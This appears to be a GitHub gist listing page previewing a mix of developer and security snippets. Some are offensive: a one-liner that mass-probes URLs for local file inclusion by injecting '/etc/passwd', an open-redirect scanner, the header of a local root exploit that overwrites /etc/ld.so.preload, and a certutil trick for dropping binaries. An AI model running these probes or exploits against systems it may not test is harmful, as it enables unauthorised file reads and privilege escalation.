Skip to content

Instantly share code, notes, and snippets.

View blackthorne's full-sized avatar

Francisco Gama T. R. blackthorne

52 followers · 85 following
View GitHub Profile
@ahopkins
ahopkins / # Sanic as Svelte development server.md
Last active June 2, 2022 23:04
Sanic as Svelte development server

Sanic as Svelte development server

The purpose of this gist is to show how Sanic can be used as a development server for a frontend JS framework. In this example we are running a Svelte app with rollup, but the same idea could be applied to any other frameworks JS build tools.

Run with:

sanic path.to:app -d -R ./path/to/public
@RodneyRichardson
RodneyRichardson / wincred.py
Last active December 23, 2023 11:22 — forked from exhuma/wincred.py
Retrieve Windows Credential via Python
"""
Access windows credentials
Credentials must be stored in the Windows Credentials Manager in the Control
Panel. This helper will search for "generic credentials" under the section
"Windows Credentials"
Example usage::
result = get_generic_credential('foobar')
@dwisiswant0
dwisiswant0 / bash_aliases.sh
Last active March 12, 2024 17:17
One-liner to get Open-redirect & LFI
lfi() {
gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
}
open-redirect() {
local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
}
@alinagator
alinagator / Dockerfile
Created August 23, 2016 21:28
Updated Dockerfile for https://github.com/jvns/neural-nets-are-weird
FROM continuumio/anaconda
RUN apt-get update && apt-get -y upgrade
RUN apt-get update && apt-get -y --force-yes install libprotobuf-dev libleveldb-dev libsnappy-dev libopencv-dev libhdf5-serial-dev protobuf-compiler
RUN apt-get update && apt-get -y --force-yes install build-essential
#RUN echo deb http://cz.archive.ubuntu.com/ubuntu trusty main universe > /etc/apt/sources.list
#RUN apt-get update
@0x27
0x27 / unsanitary.sh
Last active April 30, 2021 03:36
#!/bin/bash
# unsanitary.sh - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ld.so.preload to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
@mattifestation
mattifestation / drop_binary.bat
Created July 12, 2015 05:49
Drop binary data from the command line w/o needing PowerShell
echo -----BEGIN CERTIFICATE----- > encoded.txt
echo Just Base64 encode your binary data
echo TVoAAA== >> encoded.txt
echo -----END CERTIFICATE----- >> encoded.txt
certutil -decode encoded.txt decoded.bin
@joshenders
joshenders / HPN40L BMC Setup.md
Last active September 2, 2023 08:00
How to setup an N40L Remote Access Card (BMC/IPMI) under Debian Wheezy

Update BMC Firmware

As of this writing (2014-02-18), the latest firmware is 1.3. It can be updated from the webif. Use Safari, the credentials are admin/password. If you're trying to find it on your network, the OUI of the BMC NIC is a0:b3:cc.

Install Utilities

apt-get install openipmi ipmitool
@JeffPaine
JeffPaine / beautiful_idiomatic_python.md
Last active January 14, 2023 05:37
Moved to: https://github.com/JeffPaine/beautiful_idiomatic_python

Moved

Now located at https://github.com/JeffPaine/beautiful_idiomatic_python.

Why it was moved

Github gists don't support Pull Requests or any notifications, which made it impossible for me to maintain this (surprisingly popular) gist with fixes, respond to comments and so on. In the interest of maintaining the quality of this resource for others, I've moved it to a proper repo. Cheers!